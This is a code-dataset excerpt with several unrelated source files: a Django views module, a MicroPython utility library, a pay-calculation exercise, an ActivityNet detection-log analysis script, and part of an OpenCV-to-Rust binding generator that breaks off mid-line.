else:\n user = User.objects.get(username=username)\n if user:\n profile = Profile.objects.get(user=user)\n r = Relation.objects.filter(from_user=user)\n r2 = Relation.objects.filter(to_user=user)\n followers = Relation.objects.filter(from_user=request.user, to_user=profile.user).count()\n print(followers)\n st = \"Follow\"\n if followers > 0:\n st = \"Unfollow\"\n\n return render(request, \"profile.html\",\n {'title': 'Profile', 'profile': profile, 'me': r, 'them': r2, 'st': st})\n else:\n return render(request, \"index.html\", {'title': 'Home'})\n\n\ndef __logout(request):\n logout(request)\n return HttpResponseRedirect(\"login\")\n\n\ndef __cp(request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect(\"login\")\n if request.method == \"POST\":\n fullname = request.POST['fullname']\n about = request.POST['about']\n profile = Profile.objects.get(user=request.user)\n profile.fullname = fullname\n profile.about = about\n profile.statu = 1\n profile.save()\n\n return HttpResponseRedirect(\"profile/\" + request.user.username)\n return render(request, \"complete_profile.html\", {'title': 'Complete profile'})\n\n\n@csrf_protect\ndef __relation(request):\n if request.is_ajax and request.method == \"POST\":\n if request.POST['st'] == \"Follow\":\n new_relation = Relation()\n to_user = User.objects.get(username=request.POST['to_user'])\n profile = Profile.objects.get(user = to_user )\n new_relation.profile = profile\n new_relation.from_user = request.user\n new_relation.to_user = to_user\n new_relation.statu = 'y'\n new_relation.save()\n else:\n to_user = User.objects.get(username=request.POST['to_user'])\n relation = Relation.objects.get(from_user=request.user, to_user=to_user)\n 
relation.delete()\n return JsonResponse({})\n else:\n following = Relation.objects.filter(from_user=request.user)\n followers = Relation.objects.filter(to_user=request.user)\n\n return render(request, \"relations.html\", {'title': 'Relations', 'followers': followers, 'following': following})\n\n\ndef __upload(request):\n if request.is_ajax and request.method == \"Post\":\n img = request.FILES['img']\n return JsonResponse({'img': img})\n else:\n return JsonResponse({})\n\n\ndef __add_post(request):\n if request.method == \"POST\":\n formset = PostForm(request.POST, request.FILES)\n if formset.is_valid():\n formset.save()\n else:\n formset = PostForm()\n return render(request, 'add_post.html', {'formset': formset})\n","sub_path":"rusty/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643434626","text":"# ===========================================================================\n#\n# file : gf_tools.py\n# part of : godafoss micropython library\n# url : https://www.github.com/wovo/godafoss\n# author : Wouter van Ooijen (wouter@voti.nl) 2023\n# license : MIT license, see license variable in the __init__.py\n#\n# This file is part of the Godafoss perhiperal interface library.\n#\n# ===========================================================================\n#\n# This file contains some basic tooling that is not\n# MicroPytyhon specific and has no external dependencies.\n#\n# ===========================================================================\n\nimport machine\n\n\n# ===========================================================================\n\ndef sign( x ):\n return 1 if x > 0 else -1 if x < 0 else 0\n\n# ===========================================================================\n\ndef less( x, n = 1 ):\n return x - sign( x ) * n\n\n# ===========================================================================\n\ndef unity(\n x: any\n) -> any:\n \"\"\"\n returns its argument unmodified\n\n :param x: any\n the object to be returned\n\n :result: any\n the parameter\n\n This function returns its argument unmodified.\n This is used as a do-nothing default for a parameter.\n\n example::\n $insert_example( \"test_tools.py\", \"unity example\", 1 )\n \"\"\"\n return x\n\n\n# ===========================================================================\n\ndef within(\n a: any,\n low: any,\n high: any\n) -> bool:\n \"\"\"\n test whether a value is between two bounds\n\n :param a: any\n the value to be checked\n\n :param low: any\n the lower bound to check the value against\n\n :param high: any\n the higher bound to check the value against\n\n :result: any\n whether a is in the trange [low..high]\n\n This function returns whether a is between low and high.\n The low and high values are included in the allowed range.\n\n Low and high must be in order: low =< high.\n If they are not the function will return False.\n\n examples::\n $insert_example( \"test_tools.py\", \"within example\", 1 )\n \"\"\"\n return ( a >= low ) and ( a <= high )\n\n\n# ===========================================================================\n\ndef clamp(\n x: any,\n low: any,\n high: any\n) -> any:\n \"\"\"\n x, clamped to the nearest value in the range [low..high]\n\n :param x: any\n the value to clamp within the range [low..high]\n\n :param low: any\n the lower bound of the clamp interval\n\n :param high: any\n the higher bound of the clamp interval\n\n :result: any\n either x, or the 
nearest value in the range [low..high]\n\n This function returns max( low, min( x, high ) ).\n\n examples::\n $insert_example( \"test_tools.py\", \"clamp example\", 1 )\n \"\"\"\n\n return max( low, min( x, high ) )\n\n\n# ===========================================================================\n\ndef invert_bits(\n value: int,\n n_bits: int\n) -> int:\n \"\"\"\n the value, with its lower n_bits bits inverted\n\n :param value: int\n the value to invert\n\n :param n_bits: int\n the number of valid bits in the value\n\n :result: int\n the value, with its lower n_bits bits inverted\n\n This function returns the value, of which n_bits are relevant,\n with those bits inverted.\n The higher bits in the returned value are 0 (clear).\n\n examples::\n $insert_example( \"test_tools.py\", \"invert_bits example\", 1 )\n \"\"\"\n\n return ( ~ value ) & ( ( 0b1 << n_bits ) - 1 )\n\n\n# ===========================================================================\n\ndef mirror_bits(\n value: int,\n n_bits: int\n) -> int:\n \"\"\"\n the value, with its lower n_bits bits mirrored\n\n :param value: int\n the value to mirror\n\n :param n_bits: int\n the number of valid bits in the value\n\n :result: int\n the value, with its lower n_bits bits mirrored\n\n This function returns the value, of which n_bits are relevant,\n with the bits mirrored (the most significant bit becomes the least\n significant bit and vice versa, etc.)\n The higher bits in the returned value are 0 (clear).\n\n examples::\n $insert_example( \"test_tools.py\", \"mirror_bits example\", 1 )\n \"\"\"\n\n result = 0\n for _ in range( n_bits ):\n result = ( result << 1 ) | ( value & 0b01 )\n value = value >> 1\n return result\n\n\n# ===========================================================================\n\ndef bar_bits(\n n_bits: int\n) -> int:\n \"\"\"\n unsigned int value with (only) the lower n_bits bits 1\n\n :param n_bits: int\n the number of 1-value bits in the result\n\n :result: int\n unsigned int value, with (only) the lower n_bits bits 1\n\n This function returns the integer value,\n of which the lowest n_bits bits\n are 1 (set), the other (higher) bits are 0 (clear).\n\n examples::\n $insert_example( \"test_tools.py\", \"bar_bits example\", 1 )\n \"\"\"\n\n result = 0\n for _ in range( n_bits ):\n result = ( result << 1 ) | 0b1\n return result\n\n\n# ===========================================================================\n\ndef is_iterable(\n x: any\n) -> bool:\n \"\"\"\n test for iterability\n\n :param x: any\n the object to be tested for iterability\n\n :result: bool\n whether x is iterable\n\n The standard way to test for iterability is to use\n from collections.abc import Iterable,\n but this is not (yet?)
available in MicroPython.\n Hence this workaround.\n \"\"\"\n try:\n for _ in x:\n return True\n return True\n except TypeError:\n return False\n\n\n# ===========================================================================\n\ndef first_not_none(\n *args: any\n) -> any:\n \"\"\"\n return the first not None argument\n\n :param args: any\n the arguments that are considered\n\n :result: any\n the first of the \\*args that is not None\n\n This function returns the first argument that is not None.\n It is usefull to replace a default of None with\n a default value that can't be specified as a default.\n\n When there is only one argument and it is iterable,\n it is used as the list of alternatives.\n\n If all arguments are None, None is returned.\n\n examples::\n $insert_example( \"test_tools.py\", \"first_not_none example\", 1 )\n \"\"\"\n\n if ( len( args ) == 1 ) and is_iterable( args[ 0 ] ):\n args = args[ 0 ]\n\n for x in args:\n if x is not None:\n return x\n\n return None\n\n\n# ===========================================================================\n\ndef make_tuple(\n *args: any\n) -> any:\n \"\"\"\n make a tuple from a tuple or list, or from a number of arguments\n\n :param \\*args: any\n the arguments are to be turned into a tuple\n\n :result: any\n a tuple constructed from the \\*args\n\n When called with one argument, which is a list or a tuple,\n this function returns it as a tuple.\n Otherwise, it returns a tuple of its argument(s).\n\n examples::\n $insert_example( \"test_tools.py\", \"make_tuple example\", 1 )\n \"\"\"\n\n if len( args ) == 1 and isinstance( args[ 0 ], ( list, tuple ) ):\n return tuple( args[ 0 ] )\n else:\n return tuple( args )\n\n\n# ===========================================================================\n\ndef make_list(\n *args: any\n) -> any:\n \"\"\"\n make a list from a tuple or list, or from a number of arguments\n\n :param args: any\n the arguments are to be turned into a list\n\n :result: any\n a list constructed from the \\*args\n\n When called with one argument, which is a list or a tuple,\n this function returns it as a list.\n Otherwise, it returns a list of its argument(s).\n\n examples::\n $insert_example( \"test_tools.py\", \"make_list example\", 1 )\n \"\"\"\n\n if len( args ) == 1 and isinstance( args[ 0 ], ( list, tuple ) ):\n return list( args[ 0 ] )\n else:\n return list( args )\n\n\n# ===========================================================================\n\ndef nth_from(\n n: int | bool,\n *args: any\n) -> any:\n \"\"\"\n the n-th argument\n\n :param n: int | bool\n the index into the arguments\n\n :param \\*args: any\n the arguments from which the n-th is to be selected\n\n :result: any\n the n-th of the \\*args\n\n This function returns the n-th of the \\*args.\n If the number of \\*args is 1 and it is a list or tuple,\n the function returns the n-th element from it\n (the first element is the 0th).\n\n If the n argument is a boolean, it will be interpreted\n as 0 and 1, and the number of things to choose from must\n be 2.\n Note that in that case the false-option comes first,\n which is unlike a Python conditional expression\n or a c \\/ c++ ?-expression.\n\n examples::\n $insert_example( \"test_tools.py\", \"nth_from example\", 1 )\n \"\"\"\n\n options = make_tuple( *args )\n\n if isinstance( n, bool ):\n n = int( n )\n if len( options ) != 2:\n raise IndexError\n\n return options[ n ]\n\n\n# ===========================================================================\n\ndef bytes_from_int(\n value: int,\n n_bytes: 
int\n) -> bytes:\n \"\"\"bytes lsb-first representation of an int\n\n :param value: int\n the value to be converted to bytes\n\n :param n_bytes: int\n the desired number of bytes\n\n :result: bytes\n the bytes representation of the value\n\n This function returns the int value as n_byte bytes,\n least significant byte first (little endian).\n\n examples::\n $insert_example( \"test_tools.py\", \"bytes_from_int example\", 1 )\n \"\"\"\n\n array = bytearray( n_bytes )\n for i in range( 0, n_bytes ):\n array[ i ] = value & 0xFF\n value = value >> 8\n return bytes( array )\n\n\n# ===========================================================================\n\ndef int_from_bytes(\n array: bytes | bytearray,\n signed: bool = False\n) -> int:\n \"\"\"int value from a lowest-byte-first sequence of bytes\n\n :param array: bytes | bytearray\n the array of bytes that is to be converted to an integer\n \n :param signed: bool\n treat the resulting bit pattern as unsigned (False, default)\n or signed (True)\n\n :result: int\n the array interpreted as integer value\n\n This function returns the bytes as an unsigned integer value,\n the first byte as least significant byte of the int value.\n \n Python has the int.from_bytes function, but it is currently\n not implemented fully and correctly in MicroPython.\n Hence this alternative.\n\n examples::\n $insert_example( \"test_tools.py\", \"int_from_bytes example\", 1 )\n \"\"\"\n\n result = 0\n for i in range( len( array ) - 1, -1, -1 ):\n result = ( result << 8 ) | ( array[ i ] & 0xFF ) \n \n if signed and ( ( array[ -1 ] & 0x80 ) != 0 ):\n result = - ( ( result - 1 ) ^ bar_bits( 8 * len( array ) ) )\n \n return result \n\n \n# ===========================================================================\n\ndef elapsed_us( f ):\n \"\"\"\n execute function and return the elapsed time in microseconds\n \"\"\"\n \n from godafoss.gf_time import ticks_us\n \n before = ticks_us()\n f()\n after = ticks_us()\n return after - before \n\n\n# ===========================================================================\n\nclass immutable:\n \"\"\"\n make an object immutable\n\n Python names are references, and class objects are mutable,\n so a class member variable can inadvertently be modified.\n The xy class is immutable, but if it were not, this would\n be possible::\n\n origin = xy( 0, 0 )\n a = origin\n a.x = 10 # this modifies the object that origin references!\n print( origin.x ) # prints 10\n\n To prevent such modifications, a value class inherits from freeze,\n and calls immutable._init__( self ) when all its members\n have been initialized.\n\n $macro_start immutable\n Values (objects) of this class are immutable.\n $macro_end\n\n usage example::\n $insert_example( \"test_tools.py\", \"immutable example\", 1 )\n \"\"\"\n\n _frozen = False\n\n # =======================================================================\n\n def __init__( self ) -> None:\n \"\"\"\n after the initialization, the object members can't be modified\n \"\"\"\n self._frozen = True\n\n # =======================================================================\n\n def __delattr__( self, *args, **kwargs ):\n if self._frozen:\n raise TypeError( \"immutable object\" )\n object.__delattr__( self, *args, **kwargs )\n\n # =======================================================================\n\n def __setattr__( self, *args, **kwargs ):\n if self._frozen:\n raise TypeError( \"immutable object\" )\n object.__setattr__( self, *args, **kwargs )\n\n # 
=======================================================================\n\n\n# ===========================================================================\n\nclass repeater:\n \"\"\"\n iterate the indicated number of iterations, or forever when None\n\n :param iterations: int | None\n the number of iterations, or None for infinite iterationfs\n\n This iterator is usefull for iterative demos that by default\n must run forever, but might be used to run a fixed numer of times.\n\n examples::\n\n for _ in repeater( 10 ): ... # ... is repeated 10 times\n for _ in repeater( None ): ... # ... is repeated forever\n \"\"\"\n\n # =======================================================================\n\n def __init__(\n self,\n iterations: int | None\n ) -> None:\n self.iterations = iterations\n self.n = None\n\n # =======================================================================\n\n def __iter__( self ):\n self.n = 0\n return self\n\n # =======================================================================\n\n def __next__( self ):\n if self.iterations is not None:\n self.n += 1\n if self.n > self.iterations:\n raise StopIteration\n return self.n\n\n # =======================================================================\n \n# ===========================================================================\n\nclass remember:\n \"\"\"\n \"\"\"\n \n def __init__( self, addresses ):\n self._addresses = [ address for address in addresses ]\n self._data = [ machine.mem32[ address ] for address in addresses ]\n \n def restore( self ):\n for address, data in zip( self._addresses, self._data ):\n machine.mem32[ address ] = data\n \n\n# ===========================================================================\n","sub_path":"source/godafoss/gf_tools.py","file_name":"gf_tools.py","file_ext":"py","file_size_in_byte":14843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560692505","text":"\r\ndef computepay(hours, rate):\r\n #print(\"In computepay\")\r\n if hours > 40 :\r\n pay = (hours - 40) * 1.5 * rate + 40 * rate\r\n\r\n else :\r\n pay = hours * int(rate)\r\n #print(\"Returning\", pay)\r\n return pay\r\n\r\nsh = input(\"Enter Hours: \")\r\nsr = input(\"Enter Rate: \")\r\nfh = float(sh)\r\nfr = float(sr)\r\n\r\nxp = computepay(fh, fr)\r\n\r\nprint(\"Pay:\", xp)\r\n","sub_path":"chap4/ex04_06.py","file_name":"ex04_06.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409692918","text":"# --------------------------------------------------------\n# R-C3D\n# Copyright (c) 2017 Boston University\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Huijuan Xu\n# --------------------------------------------------------\n\nimport sys, os, errno\nimport numpy as np\nimport csv\nimport json\nimport copy\n\nassert len(sys.argv) == 2, \"Usage: python log_analysis.py \"\nlogfile = sys.argv[1]\n\n\ndef nms(dets, thresh=0.4):\n \"\"\"Pure Python NMS baseline.\"\"\"\n if len(dets) == 0: return []\n x1 = dets[:, 0]\n x2 = dets[:, 1]\n scores = dets[:, 2]\n lengths = x2 - x1\n order = scores.argsort()[::-1]\n keep = []\n while order.size > 0:\n i = order[0]\n keep.append(i)\n xx1 = np.maximum(x1[i], x1[order[1:]])\n xx2 = np.minimum(x2[i], x2[order[1:]])\n inter = np.maximum(0.0, xx2 - xx1)\n ovr = inter / (lengths[i] + lengths[order[1:]] - inter)\n inds = np.where(ovr <= thresh)[0]\n order = order[inds + 1]\n return keep\n\ndef 
generate_classes():\n META_FILE = '../../../preprocess/activityNet/activity_net.v1-3.min.json'\n data = json.load(open(META_FILE))\n class_list = []\n for vid, vinfo in data['database'].iteritems():\n for item in vinfo['annotations']:\n class_list.append(item['label'])\n\n class_list = list(set(class_list))\n classes = {0: 'Background'}\n for i,cls in enumerate(class_list):\n classes[i+1] = cls\n return classes\n\nclasses = generate_classes()\n\ndef get_segments(data, thresh):\n segments = []\n vid = 'Background'\n find_next = False\n tmp = {'label' : 0, 'score': 0, 'segment': [0, 0]}\n for l in data:\n # video name and sliding window length\n if \"fg_name :\" in l:\n vid = l.split('/')[5]\n\n # frame index, time, confident score\n elif \"frames :\" in l:\n start_frame=int(l.split()[4])\n end_frame=int(l.split()[5])\n stride = int(l.split()[6].split(']')[0])\n\n elif \"activity:\" in l:\n label = int(l.split()[1])\n tmp['label'] = label\n find_next = True\n\n elif \"im_detect\" in l:\n return vid, segments\n\n elif find_next:\n left_frame = float(l.split()[1])*stride + start_frame\n right_frame = float(l.split()[2])*stride + start_frame\n if (left_frame < end_frame) and (right_frame <= end_frame):\n left = left_frame / 25.0\n right = right_frame / 25.0\n score = float(l.split()[3].split(']')[0])\n if score > thresh:\n tmp1 = copy.deepcopy(tmp)\n tmp1['score'] = score\n tmp1['segment'] = [left, right]\n segments.append(tmp1)\n elif (left_frame < end_frame) and (right_frame > end_frame):\n if (end_frame-left_frame)*1.0/(right_frame-left_frame)>=0:\n right_frame = end_frame\n left = left_frame / 25.0\n right = right_frame / 25.0\n score = float(l.split()[3].split(']')[0])\n if score > thresh:\n tmp1 = copy.deepcopy(tmp)\n tmp1['score'] = score\n tmp1['segment'] = [left, right]\n segments.append(tmp1)\n\n\ndef analysis_log(logfile, thresh):\n with open(logfile, 'r') as f:\n lines = f.read().splitlines()\n predict_data = []\n res = {}\n for l in lines:\n if \"frames :\" in l:\n predict_data = []\n predict_data.append(l)\n if \"im_detect:\" in l:\n vid, segments = get_segments(predict_data, thresh)\n if vid not in res:\n res[vid] = []\n res[vid] += segments\n return res\n\nsegmentations = analysis_log(logfile, thresh = 0.005)\n\n\ndef select_top(segmentations, nms_thresh=0.99999, num_cls=0, topk=0):\n res = {}\n for vid, vinfo in segmentations.iteritems():\n # select most likely classes\n if num_cls > 0:\n ave_scores = np.zeros(201)\n for i in xrange(1, 201):\n ave_scores[i] = np.sum([d['score'] for d in vinfo if d['label']==i])\n labels = list(ave_scores.argsort()[::-1][:num_cls])\n else:\n labels = list(set([d['label'] for d in vinfo]))\n\n # NMS\n res_nms = []\n for lab in labels:\n nms_in = [d['segment'] + [d['score']] for d in vinfo if d['label'] == lab]\n keep = nms(np.array(nms_in), nms_thresh)\n for i in keep:\n tmp = {'label':classes[lab], 'score':nms_in[i][2], 'segment': nms_in[i][0:2]}\n res_nms.append(tmp)\n \n # select topk\n scores = [d['score'] for d in res_nms]\n sortid = np.argsort(scores)[-topk:]\n res[vid] = [res_nms[id] for id in sortid]\n return res\n\nsegmentations = select_top(segmentations)\n\n\nres = {'version': 'VERSION 1.3', \n 'external_data': {'used': True, 'details': 'C3D pre-trained on sport-1M training set'},\n 'results': {}}\nfor vid, vinfo in segmentations.iteritems():\n res['results'][vid] = vinfo\n\n\nwith open('results.json', 'w') as outfile:\n json.dump(res, 
outfile)\n","sub_path":"experiments/activitynet/test/activitynet_log_analysis.py","file_name":"activitynet_log_analysis.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"250281068","text":"import sys, re, os.path\nimport logging\nfrom pprint import pformat\nfrom string import Template\n\nif sys.version_info[0] >= 3:\n from io import StringIO\nelse:\n from cStringIO import StringIO\n\n#\n# EXCEPTIONS TO AUTO GENERATION\n#\n\nManualFuncs = {\n \"core\" : [\n [ \"class cv.Mat\" , \"\", [], [] ],\n [ \"cv.Mat.Mat\", \"Mat\", [], [] ],\n [ \"cv.Mat.Mat\", \"Mat\", [],\n [ [ \"int\", \"rows\" ], [ \"int\", \"cols\" ], [ \"int\" , \"type\" ] ] ],\n [ \"cv.Mat.depth\", \"int\", [\"/C\"], [] ],\n [ \"cv.Mat.type\", \"int\", [\"/C\"], [] ],\n [ \"cv.Mat.channels\", \"int\", [\"/C\"], [] ],\n [ \"cv.Mat.size\", \"Size\", [\"/C\"], [] ],\n [ \"cv.Mat.elemSize\", \"size_t\", [\"/C\"], [] ],\n [ \"cv.Mat.isContinuous\", \"bool\", [\"/C\"], [] ],\n [ \"cv.Mat.clone\", \"Mat\", [\"/C\"], [] ],\n [ \"cv.Mat.copyTo\", \"void\", [\"/C\"], [[\"Mat\", \"OutputArray\"]] ],\n [ \"cv.Mat.convertTo\", \"void\", [\"/C\"], [ [\"Mat\", \"OutputArray\"], [\"int\", \"rtype\"], [\"double\", \"scale\"]] ],\n [ \"cv.Mat.ptr\", \"uchar*\", [\"/C\"], [[\"int\", \"Row\"]] ],\n ]\n}\n\nrenamed_funcs = {\n \"cv_core_divide_MMMDI\": \"divide_mat\",\n \"cv_core_norm_MMIM\":\"norm_dist\",\n \"cv_core_ellipse_MPSDDDSIII\": \"ellipse_tilted\",\n \"cv_core_Mat_Mat_III\": \"for_rows_and_cols\",\n \"cv_core_Mat_type\": \"cv_type\",\n \"cv_calib3d_StereoSGBM_StereoSGBM_IIIIIIIIIIB\": \"for_params\",\n \"cv_calib3d_StereoBM_StereoBM_III\": \"for_params\",\n \"cv_features2d_BOWKMeansTrainer_cluster_M\": \"cluster_with_desc\",\n \"cv_features2d_BOWTrainer_cluster_M\": \"cluster_with_desc\",\n \"cv_features2d_DescriptorMatcher_match_MMVM\" : \"matches\",\n \"cv_features2d_DescriptorMatcher_match_MVV\" : \"matches\",\n \"cv_features2d_KeyPoint_KeyPoint_FFFFFII\" : \"for_params\",\n \"cv_features2d_DMatch_DMatch_IIF\" : \"for_params\",\n \"cv_features2d_DMatch_DMatch_IIIF\" : \"for_image\",\n \"cv_features2d_DescriptorMatcher_knnMatch_MMVIMB\" : \"knnTrainMatch\",\n \"cv_features2d_DescriptorMatcher_match_MMVM\": \"trainAndMatch\",\n \"cv_features2d_BRISK_BRISK_VVFFV\" : \"for_pattern\",\n \"cv_highgui_VideoWriter_VideoWriter_SIDSB\" : \"for_params\",\n \"cv_highgui_VideoCapture_VideoCapture_S\" : \"for_file\",\n \"cv_highgui_VideoCapture_VideoCapture_I\" : \"for_device\",\n \"cv_highgui_VideoCapture_open_S\" : \"open_file\",\n \"cv_highgui_VideoCapture_open_I\" : \"open_fd\",\n \"cv_imgproc_integral_MMMI\" : \"integral_squares\",\n \"cv_imgproc_integral_MMMMI\" : \"integral_squares_tilted\",\n \"cv_imgproc_distanceTransform_MMMIII\" : \"distance_tranform_labels\",\n \"cv_imgproc_Subdiv2D_Subdiv2D_R\" : \"for_rect\",\n \"cv_imgproc_Subdiv2D_insert_V\" : \"insert_multi\",\n \"cv_objdetect_HOGDescriptor_HOGDescriptor_S\": \"for_file\",\n \"cv_objdetect_HOGDescriptor_HOGDescriptor_SSSSIIDIDBI\": \"for_params\",\n \"cv_objdetect_CascadeClassifier_detectMultiScale_MVVVDIISSB\" : \"detectMultiScaleFull\",\n \"cv_objdetect_CascadeClassifier_CascadeClassifier_S\": \"for_file\",\n \"cv_video_calcOpticalFlowSF_MMMIIIDDIDDDIDDD\" : \"calc_optical_flow_full\",\n \"cv_video_KalmanFilter_KalmanFilter_IIII\" : \"for_params\",\n \"cv_video_BackgroundSubtractorMOG_BackgroundSubtractorMOG_IIDD\" : \"for_params\",\n 
\"cv_video_BackgroundSubtractorMOG2_BackgroundSubtractorMOG2_IFB\" : \"for_params\",\n}\n\nclass_ignore_list = (\n #core\n \"FileNode\", \"FileStorage\", \"KDTree\", \"IndexParams\", \"Params\"\n #videoio\n# \"VideoWriter\",\n)\n\nconst_ignore_list = (\n \"CV_EXPORTS_W\", \"CV_EXPORTS_W_SIMPLE\", \"CV_EXPORTS_W_MAP\", \"CV_MAKE_TYPE\",\n \"CV_IS_CONT_MAT\", \"CV_RNG_COEFF\", \"IPL_IMAGE_MAGIC_VAL\",\n \"CV_SET_ELEM_FREE_FLAG\", \"CV_FOURCC_DEFAULT\",\n \"CV_WHOLE_ARR\", \"CV_WHOLE_SEQ\", \"CV_PI\", \"CV_LOG2\",\n \"CV_TYPE_NAME_IMAGE\",\n\n)\n\nfunc_arg_fix = {\n}\n\n#\n# TYPES MAPPING\n#\n\nprimitives = {\n u\"void\" : { u\"ctype\": \"void\", \"rtype\": \"()\" },\n u\"bool\" : { u\"ctype\": \"int\", u\"rtype\": \"bool\" },\n u\"uchar\" : { u\"ctype\": \"unsigned char\", u\"rtype\": \"u8\" },\n u\"short\" : { u\"ctype\": \"short\", u\"rtype\": \"u16\" },\n u\"int\" : { u\"ctype\": \"int\", u\"rtype\": \"i32\" },\n u\"size_t\": { u\"ctype\": \"std::size_t\", u\"rtype\": \"::libc::types::os::arch::c95::size_t\" },\n u\"int64\" : { u\"ctype\": \"int64\", u\"rtype\": \"i64\" },\n u\"float\" : { u\"ctype\": \"float\", u\"rtype\": \"f32\" },\n u\"double\": { u\"ctype\": \"double\", u\"rtype\": \"f64\" },\n u\"uchar*\": { u\"ctype\": \"unsigned char*\", u\"rtype\": \"*mut u8\" }\n}\n\n# trait_classes = [ \"Algorithm\" ]\n\nforced_boxed_classes = { }\n\nvalue_struct_types = {\n (\"core\", \"Point\") : ((\"x\", \"int\"), (\"y\", \"int\")),\n (\"core\", \"Point2d\") : ((\"x\", \"double\"), (\"y\", \"double\")),\n (\"core\", \"Point2f\") : ((\"x\", \"float\"), (\"y\", \"float\")),\n (\"core\", \"Size\") : ((\"width\", \"int\"), (\"height\", \"int\")),\n (\"core\", \"Size2f\") : ((\"width\", \"float\"), (\"height\", \"float\")),\n (\"core\", \"Rect\") : ((\"x\", \"int\"), (\"y\", \"int\"), (\"width\", \"int\"), (\"height\", \"int\")),\n (\"core\", \"RotatedRect\") : ((\"x\", \"float\"), (\"y\", \"float\"), (\"width\", \"float\"),(\"height\", \"float\"), (\"angle\", \"float\")),\n (\"core\", \"TermCriteria\") : ((\"type\", \"int\"), (\"maxCount\", \"int\"), (\"epsilon\", \"double\")),\n (\"core\", \"Scalar\") : ((\"data\", \"double[4]\"),)\n}\n\nfor s in [2,3,4,6]:\n for t in [(\"uchar\",\"b\"),(\"short\",\"s\"),(\"int\",\"i\"),(\"double\",\"d\"),(\"float\",\"f\")]:\n value_struct_types[(\"core\",\"Vec%d%s\"%(s,t[1]))] = (\"data\", \"%s[%d]\"%(t[0],s)),\n\n#\n# TEMPLATES\n#\n\nT_CPP_MODULE = \"\"\"\n//\n// This file is auto-generated, please don't edit!\n//\n\n#define LOG_TAG \"org.opencv.$m\"\n\n#include \"stdint.h\"\n#include \"common.h\"\n\ntypedef int64_t int64;\n\n#include \"types.h\"\n#include \n\n#include \"return_types.h\"\n\n#include \"opencv2/opencv_modules.hpp\"\n#ifdef HAVE_OPENCV_$M\n\n#include \n\n#include \"opencv2/$m/$m.hpp\"\nusing namespace cv;\n\n$includes\n\nextern \"C\" {\n\n$code\n\n} // extern \"C\"\n\n#endif // HAVE_OPENCV_$M\n\"\"\"\n\nT_RUST_MODULE = \"\"\"\n//\n// This file is auto-generated, please don't edit!\n//\n\n\nuse ::sys::$m::*;\n\npub mod $m {\n use sys::types::*;\n use std::ffi::{ CStr, CString };\n use std::mem::transmute;\n use libc::types::common::c95::c_void;\n\n $module_import\n $code\n}\n\n\"\"\"\n\nconst_private_list = (\n \"CV_MOP_.+\",\n \"CV_INTER_.+\",\n \"CV_THRESH_.+\",\n \"CV_INPAINT_.+\",\n \"CV_RETR_.+\",\n \"CV_CHAIN_APPROX_.+\",\n \"OPPONENTEXTRACTOR\",\n \"GRIDDETECTOR\",\n \"PYRAMIDDETECTOR\",\n \"DYNAMICDETECTOR\",\n)\n\n#\n# AST-LIKE\n#\n\nclass GeneralInfo():\n def __init__(self, gen, name, namespaces):\n self.gen = gen\n self.namespace, 
self.classpath, self.classname, self.name = self.parseName(name, namespaces)\n\n    def parseName(self, name, namespaces):\n        '''\n        input: full name and available namespaces\n        returns: (namespace, classpath, classname, name)\n        '''\n        name = name[name.find(\" \")+1:].strip() # remove struct/class/const prefix\n        spaceName = \"\"\n        localName = name # .\n        for namespace in sorted(namespaces, key=len, reverse=True):\n            if name.startswith(namespace + \".\"):\n                spaceName = namespace\n                localName = name.replace(namespace + \".\", \"\")\n                break\n        pieces = localName.split(\".\")\n        if len(pieces) > 2: # ...\n            return spaceName, \".\".join(pieces[:-1]), pieces[-2], pieces[-1]\n        elif len(pieces) == 2: # .\n            return spaceName, pieces[0], pieces[0], pieces[1]\n        elif len(pieces) == 1: # \n            return spaceName, \"\", \"\", pieces[0]\n        else:\n            return spaceName, \"\", \"\", \"\" # error?! (four elements, to match the unpacking above)\n\ndef make_cpp_type(t):\n    if(t == \"size_t\"):\n        return t\n    return t.replace(\"_\", \"::\")\n\nclass ArgInfo():\n    def __init__(self, gen, arg_tuple): # [ ctype, name, def val, [mod], argno ]\n        self.gen = gen\n        self.pointer = False\n        type = arg_tuple[0]\n        if type.endswith(\"*\"):\n            type = type[:-1]\n            self.pointer = True\n        if type == \"String\":\n            type = \"string\"\n        if type == \"Size2i\":\n            type = \"Size\"\n        self.ctype = type\n        self.type = make_cpp_type(type)\n        self.name = arg_tuple[1]\n        self.defval = \"\"\n        self.typeinfo = None\n        if len(arg_tuple) > 2:\n            self.defval = arg_tuple[2]\n        self.out = \"\"\n        if len(arg_tuple) > 3 and \"/O\" in arg_tuple[3]:\n            self.out = \"O\"\n        if len(arg_tuple) > 3 and \"/IO\" in arg_tuple[3]:\n            self.out = \"IO\"\n\n    def rsname(self):\n        rsname = self.name\n        if rsname in [\"type\",\"box\"]:\n            rsname = \"_\" + rsname\n        return rsname\n\n    def type_info(self):\n        if self.typeinfo == None:\n            self.typeinfo = self.gen.get_type_info(self.type)\n        return self.typeinfo\n\n    def __repr__(self):\n        return Template(\"ARG $ctype$p $name=$defval\").substitute(ctype=self.type,\n                                                                  p=\" *\" if self.pointer else \"\",\n                                                                  name=self.name,\n                                                                  defval=\"\" #self.defval\n                                                                  )\n\nclass FuncInfo(GeneralInfo):\n    def __init__(self, gen, decl, namespaces=[]): # [ funcname, return_ctype, [modifiers], [args] ]\n        GeneralInfo.__init__(self, gen, decl[0], namespaces)\n        self.isconstructor = self.name == self.classname\n        self.overridename = self.name\n        self.ci = None\n        for m in decl[2]:\n            if m.startswith(\"=\"):\n                self.overridename = m[1:]\n        self.static = [\"\",\"static\"][ \"/S\" in decl[2] ]\n        if self.isconstructor:\n            self.type = \"::\".join(decl[0].split(\".\")[1:-1])\n        else:\n            self.type = make_cpp_type(decl[1])\n        if self.type == \"Size2i\":\n            self.type = \"Size\"\n        self.cppname = self.name.replace(\".\", \"::\")\n        self.cname = \"_\".join(decl[0].split(\".\")[1:])\n        self.args = []\n        self.class_nested_cppname = \"::\".join(decl[0].split(\".\")[1:-1])\n        for a in 